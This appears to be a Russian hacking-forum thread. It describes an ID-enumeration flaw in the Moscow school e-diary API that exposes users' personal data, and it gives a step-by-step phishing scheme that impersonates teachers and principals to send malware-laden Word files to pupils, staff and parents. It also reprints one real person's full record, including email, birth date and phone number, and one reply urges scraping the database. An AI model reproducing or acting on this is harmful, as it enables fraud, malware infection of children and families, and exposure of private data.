Привет. Недавно наткнулся на баг на сайте mrko.mos.ru. По ссылке https://dnevnik.mos.ru/lms/api/users/{сюда нужно вставить 7 рандомных цифр} После сеих действий мы получаем полное имя, возраст, почту и школу данного персонажа. А эти данные мы и будем юзать. С фейк почты пишем: если вам попался ученик, то пишем от имени учителя. В самом письме пишем "От твоей классной руководительницы. Посмотри пожалуйста новое расписание: {скидывайте здесь word файл с вашими какашками (вирусами)} Если попались данные учителя, пишем ему от имени директора. "От директора такой-то школы(номер школы будет). Поступила информация о изменении расписания. Прошу всех ознакомиться: {скидывайте здесь word файл с вашими какашками (вирусами)} Если почта родителя, то лушче писать от имени классного руководителя. "От классной руководительницы вашего ребёнка. Поступила информация о изменении расписания. Прошу всех ознакомиться: {скидывайте здесь word файл с вашими какашками (вирусами)} Перед всеми письмами в начале нужно написать, что вашу старую почту взломали и тому подобное. Вирусы желательно криптовать. Вводя рандомные 7 цифр вы наткнётесь на очень многих персонажей, так что шанс вломать кого-нибудь будет выше, так как людей дохуя Надеюсь вам понравилась схема. Может что-то подобное было, но я подобного не видел. УДАЧИ ВО ВЗЛОМЕ! #Моятема
ты получаешь почту человека и его имя и где он учится. этой информации достаточно (наверно), чтобы если ты ему напишешь на почту он тебе поверил, потому что обычный человек не будет знать кто это. то есть можно кинуть склеенный word файл, например про новое расписание в школе. а он откроет, возможно даже, не заподозрив ничего
{"id":1,"email":"zhdanovvn@edu.mos.ru","sex":"male","password":null,"locked":false,"temporaryLocked":false,"fullCount":0,"sessionsCount":0,"updatedAt":null,"profiles":[{"id":494869,"type":"author","roles":[],"user_id":1,"school_id":1,"school_shortname":"ГБОУ Лицей № 507"},{"id":2,"type":"teacher","roles":["principal","teacher","deputy"],"user_id":1,"school_id":1,"school_shortname":"ГБОУ Лицей № 507"}],"captcha":null,"hidden":false,"gusoev_login":"zhdanovvn507","first_name":"Владимир","last_name":"Жданов","middle_name":"Николаевич","date_of_birth":"1959-02-12","phone_number":"79168445411","mrko_user_id":2714908,"sms_notify_message":null,"email_notify_message":null,"ekis_key":null,"change_password_required":null,"snils":null,"guid":null,"is_hidden":false,"locked_by_user_id":0,"lock_datetime":null,"last_sign_in_at":"2017-04-11 12:39:24"} автор сиего дневника
Чувак, это правда круто) Боюсь только, что инфа может быстро разойтись и дырку эту прикроют в ближайшее время. Была бы вот возможность столь сильно не распространять новость, может ктонть, да успел спарсить их базку)